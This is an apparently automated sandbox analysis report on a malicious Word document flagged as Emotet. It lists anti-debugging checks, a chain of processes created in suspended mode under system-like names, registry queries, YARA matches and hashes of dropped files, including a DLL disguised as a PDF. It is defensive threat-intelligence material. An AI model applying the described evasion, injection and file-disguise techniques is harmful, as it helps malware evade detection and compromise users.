Source: dhcpcmonitor.exe, 0000000C.00000002.2273855343.000000000030F000.00000004.00000020.sdmp	Binary or memory string: PPTP00VMware_S

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00644DF0 mov eax, dword ptr fs:[00000030h]	8_2_00644DF0
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00643F00 mov eax, dword ptr fs:[00000030h]	8_2_00643F00
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F3F00 mov eax, dword ptr fs:[00000030h]	9_2_003F3F00
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F4DF0 mov eax, dword ptr fs:[00000030h]	9_2_003F4DF0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F3F00 mov eax, dword ptr fs:[00000030h]	10_2_003F3F00
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F4DF0 mov eax, dword ptr fs:[00000030h]	10_2_003F4DF0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_00333F00 mov eax, dword ptr fs:[00000030h]	11_2_00333F00
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_00334DF0 mov eax, dword ptr fs:[00000030h]	11_2_00334DF0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F3F00 mov eax, dword ptr fs:[00000030h]	12_2_004F3F00
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F4DF0 mov eax, dword ptr fs:[00000030h]	12_2_004F4DF0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_00293F00 mov eax, dword ptr fs:[00000030h]	13_2_00293F00
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_00294DF0 mov eax, dword ptr fs:[00000030h]	13_2_00294DF0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C64DF0 mov eax, dword ptr fs:[00000030h]	14_2_01C64DF0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C63F00 mov eax, dword ptr fs:[00000030h]	14_2_01C63F00
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F3F00 mov eax, dword ptr fs:[00000030h]	15_2_003F3F00
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F4DF0 mov eax, dword ptr fs:[00000030h]	15_2_003F4DF0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00473F00 mov eax, dword ptr fs:[00000030h]	16_2_00473F00
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00474DF0 mov eax, dword ptr fs:[00000030h]	16_2_00474DF0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

8_2_00649860

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Code function: 8_2_006480A0 SetFileInformationByHandle,GetSystemTimeAsFileTime,_snwprintf,GetProcessHeap,HeapFree,CreateFileW,CreateFileW,CloseHandle,

8_2_006480A0

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Code function: 16_2_004753D0 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,

16_2_004753D0

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 0000000A.00000003.2260910791.0000000000688000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2274679265.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2269436388.0000000000331000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2289663022.00000000005B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2274011391.00000000004F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2260946472.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2330396700.00000000002B4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2278477954.0000000000574000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2330617776.0000000000471000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2265106835.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2289619290.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2269524139.0000000000504000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2265408389.0000000000548000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2273841914.00000000002F6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2265371977.0000000000686000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2279155029.00000000002B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2255546226.0000000000641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2284287661.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2282904583.0000000000274000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2286207050.0000000001C61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2256075266.0000000000658000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2255733615.0000000000926000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2278304115.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2269934201.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2261089149.0000000000614000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2289418364.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2251551044.0000000000928000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 13.3.adsmsext.exe.5b8ab8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.688500.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.5b8ab8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.msvcp120_clr0400.exe.2f8598.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.9285b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.tmp_e473b4.exe.9285b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.normaliz.exe.658540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.2f8598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.mmcshext.exe.688500.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.ir50_qcx.exe.548548.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.adsmsext.exe.5b8ab8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.2f8560.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.tmp_e473b4.exe.9285b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.548548.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.normaliz.exe.658540.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.2f8598.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.548548.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.qdvd.exe.5b8518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.640000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.5b8ab8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.9285b8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.dhcpcmonitor.exe.2f8560.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.5b8518.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.5b8518.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.1c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.dhcpcmonitor.exe.2f8560.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.mmcshext.exe.688500.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.qdvd.exe.5b8518.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.ir50_qcx.exe.548548.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.2f8560.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.688500.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.658540.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.4f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.658540.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.msvcp120_clr0400.exe.2f8598.0.unpack, type: UNPACKEDPE

ID:	425356
Product:	CloudBasic
Start time:	00:16:20
Start date:	27.05.2021
Sample:	sample1.bin
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	7dbd8ecfada1d39a81a58c9468b91039
SHA1:	0d21e2742204d1f98f6fcabe0544570fd6857dd3
SHA256:	dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95
Filetype:	Microsoft Word document (32009/1) 54.23%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0001.doc	ASCII text, with very long lines, with no line terminators	7E9AB23E4F7C98AF0A03B64E3C14D7F6	BAD0DC91FB2929FDBF66E569257BABA97E1EC233	532A6B3137804F51266923EBB06FA6DE43022C2B14F14F6785DDFDA8CA4238EE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0002.doc	data	DA122309698B26E96848A6A829EEF5C1	DFA1B8C96C19827A595EEB15B2EC5386F9746CEF	26585F7107FBECBA9F5282D4C1F1783441C60187057133121BD40D5C31C6149A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0003.doc	ASCII text, with very long lines, with CRLF line terminators	1D35754EDB0B7AA76891735215FC048A	E0B1C34B3C39C1F097B7A3749174D098DC51E265	C31DBCD8F7F979CB09159FE60B70A0C8F7A58C5E67EA8522E031F0BC5DF8A348
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0005.doc	ASCII text, with very long lines, with no line terminators	7E9AB23E4F7C98AF0A03B64E3C14D7F6	BAD0DC91FB2929FDBF66E569257BABA97E1EC233	532A6B3137804F51266923EBB06FA6DE43022C2B14F14F6785DDFDA8CA4238EE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0291.doc	data	DA122309698B26E96848A6A829EEF5C1	DFA1B8C96C19827A595EEB15B2EC5386F9746CEF	26585F7107FBECBA9F5282D4C1F1783441C60187057133121BD40D5C31C6149A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0416.doc	ASCII text, with very long lines, with CRLF line terminators	1D35754EDB0B7AA76891735215FC048A	E0B1C34B3C39C1F097B7A3749174D098DC51E265	C31DBCD8F7F979CB09159FE60B70A0C8F7A58C5E67EA8522E031F0BC5DF8A348
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D50EB3E9-B04E-4308-B886-6463077025FE}.tmp	data	9649F0A1F71A4D43EDD7A5BC31B8A43E	F2A1EBB9CD46A15DAB851068865C0EDA9A7B2CEC	A815F7BE46CAC3CD990633D0DC3B30410858FA709DF4220AD8B33DB82AD3ED20
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52B8A12-B174-499E-B3BD-E7523F18DF93}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Ksh1.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 27 06:17:39 2021, mtime=Thu May 27 06:17:39 2021, atime=Thu May 27 06:17:41 2021, length=595972, window=hide	0C0513DCA0BF6D1D9AFC673AFB880D3B	1A4DDA407197609DAC4A04465360A2B9F7680C5A	5FA898CAD27FF5B3EF16C78FAD38B3CFD67A27847151A7498E16A24E3883EDB6
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Public.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Jul 14 02:20:08 2009, mtime=Thu May 27 06:17:39 2021, atime=Thu May 27 06:17:39 2021, length=4096, window=hide	B82B40CDE8C91EC708728BCAEB6ED185	73DEF80ECE7D0BF0DB7E208F1F3DBAA37EA7E30C	A8EC0AFED648FDD1645D7A8603EA8DF354A7CE88C2473080425B516F6019B809
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	9DDA3519F04FDEEB47B198EDD010E507	AC6C4075745C0F0064ADED9504934DDA44CB30E9	A677F9380C0B0EB229D861D18FDDFFD4642FFCAF1ABF9007A77EC37F05F0BDBC
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample1.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 27 06:16:25 2021, mtime=Thu May 27 06:16:25 2021, atime=Thu May 27 06:16:31 2021, length=856064, window=hide	D79CF64F781B213CE72965233760B911	0EC073D030B6690CD751F9B6F07371F92ECF7077	205B59476CA151EB3DBC738D47447A7E7CD0E293F3FB56572B7A9B87F2EACE34
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\Desktop\~$ample1.doc	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\Public\Ksh1.pdf	PE32 executable (DLL) (console) Intel 80386, for MS Windows	706EA7F029E6BC4DBF845DB3366F9A0E	942443DFB8784066523DB761886115E08C99575F	FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC
C:\Users\Public\~$Ksh1.doc	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\Public\~$Ksh1.xls	data	39EB3053A717C25AF84D576F6B2EBDD2	F6157079187E865C1BAADCC2014EF58440D449CA	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\Public\~WRD0000.tmp	ASCII text, with very long lines, with CRLF line terminators	D631AB4CEFF199B52FF4E4B7AAD0199D	F30002C31BF32184507182100942A2012F0B8703	9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE
C:\Users\Public\~WRD0004.tmp	ASCII text, with very long lines, with CRLF line terminators	D631AB4CEFF199B52FF4E4B7AAD0199D	F30002C31BF32184507182100942A2012F0B8703	9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE

Analysis Report sample1.bin

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs